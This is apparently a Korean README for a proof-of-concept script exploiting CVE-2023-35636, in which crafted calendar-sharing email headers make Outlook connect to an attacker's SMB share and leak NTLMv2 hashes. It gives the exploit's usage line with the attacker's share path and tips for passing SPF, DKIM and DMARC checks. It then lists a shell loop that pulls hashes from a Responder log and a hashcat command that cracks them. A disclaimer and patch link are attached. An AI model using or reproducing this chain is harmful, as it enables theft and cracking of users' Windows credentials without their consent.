
Microsoft Outlook 정보 유출 취약점 (비밀번호 해시 유출) - Expect Script POC
Microsoft Outlook 정보 유출 취약점 (비밀번호 해시 누출) - Expect Script POC
CVE-2023-35636은 Microsoft Outlook의 캘린더 공유 기능을 악용한 것으로, 이메일에 두 개의 헤더를 추가하면 Outlook이 콘텐츠를 공유하고 지정된 머신에 접속하도록 하여 NTLM v2 해시를 가로챌 수 있는 기회를 만듭니다.

usage: ./cve-2023-35636.sh mx.fqdn port email_sender email_recipient smb_share
./cve-2023-35636.sh mail.mydomain.com 25 [email protected] [email protected] \\\\x.x.x.x\\mycalendar.ics (모든 백슬래시를 잊지 마세요)

참고: chmod +x cve-2023-35636.sh
require app expect
합법적인 발신 IP와 이메일 발신자 필요 (SPF, DKIM, DMARC 통과를 위해)


for user in strings Responder-Session.log | grep "NTLMv2-SSP Hash" | cut -d ":" -f 4-6 | sort -u -f | awk '{$1=$1};1'
do
echo "[*] search for: $user";
strings Responder-Session.log | grep "NTLMv2-SSP Hash" | grep -i $user | cut -d ":" -f 4-10 | head -n 1 | awk '{$1=$1};1' >> ntlm-hashes.txt
done
hashcat -a 0 -m 5600 ntlm-hashes.txt rockyou.txt -o cracked.txt -O
참고: https://www.varonis.com/blog/outlook-vulnerability-new-ways-to-leak-ntlm-hashes
해결 방법/수정: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-35636
저에 대한 더 많은 정보 ;) https://www.linkedin.com/in/duy-huan-bui/
⚠️ 면책 조항: 중요: 이 스크립트는 교육, 윤리적 테스트 및 합법적인 사용 목적으로만 제공됩니다. 명시적 허가 없이 어떤 시스템이나 네트워크에도 사용하지 마십시오. 컴퓨터 시스템 및 네트워크에 대한 무단 접근은 불법이며, 허가 없이 활동하는 사용자는 법적 조치를 받을 수 있습니다. 작성자는 이 스크립트의 오용으로 인해 발생하는 모든 피해에 대해 책임을 지지 않습니다.